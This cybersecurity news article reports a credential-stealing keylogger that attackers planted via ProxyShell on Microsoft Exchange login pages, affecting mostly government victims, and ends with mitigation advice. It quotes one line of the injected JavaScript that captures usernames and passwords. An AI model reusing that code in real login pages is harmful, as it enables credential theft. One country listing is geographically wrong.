Keylogger Embedded Microsoft Exchange Server

Positive Technologies’ Expert Security Centre (PT ESC) found a sophisticated keylogger hidden on the main page of Microsoft Exchange Servers.

This is a major security breach that affects businesses and government bodies around the world.

The malicious actors of a widespread and covert attack that has been stealing private credentials since 2021 were discovered during an incident response operation. Microsoft Exchange Server contains a keylogger that has been stealing government agency logins worldwide.

Discovery and Attack Mechanism

The PT ESC team discovered the keylogger while investigating an incident involving a compromised Microsoft Exchange Server. The malicious code was discovered in the clkLgn() function of the server’s primary page.

ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

This keylogger records user credentials, such as usernames and passwords, and stores them in a file that can be accessed through a specific internet path.

The attack exploited the ProxyShell vulnerability, a well-documented security vulnerability in Microsoft Exchange Servers. The attackers were able to inject the keylogger code into the server’s primary page by exploiting this vulnerability. The hackers employed the following code snippet:

var ObjectData = "ObjectType=" + escape(curTime + "\t" + gbid("username").value + "\t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);

Furthermore, the attackers altered the logon.aspx file to process the obtained credentials and redirect them to a file that is accessible via the internet. This enabled the attackers to acquire and exfiltrate sensitive login information undetected.

The investigation revealed that the attack had impacted more than 30 victims, the majority of whom were government agencies. Educational institutions, corporations, and IT companies are among the affected entities.

These assaults have impacted a variety of countries in Africa and the Middle East, such as Russia, the UAE, Kuwait, Oman, Niger, Nigeria, Ethiopia, Mauritius, Jordan, and Lebanon.

Recommendations and Mitigation

Positive Technologies has notified all affected organizations and recommended mitigating the threat. Organizations using Microsoft Exchange Servers are advised to:

  1. Check for Compromise: Search for the stealer code on the main page of their Microsoft Exchange Server.
  2. Patch Vulnerabilities: Ensure all known vulnerabilities, including ProxyShell, are patched promptly.
  3. Monitor Logs: Regularly monitor server logs for unusual activity and unauthorized access attempts.
  4. Enhance Security Measures: Implement multi-factor authentication and other advanced security measures to protect against credential theft.

This incident underscores the critical importance of maintaining robust cybersecurity defenses and staying vigilant against evolving threats.

As attackers continue to exploit vulnerabilities in widely used software, organizations must prioritize proactive security measures to safeguard their sensitive information.

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.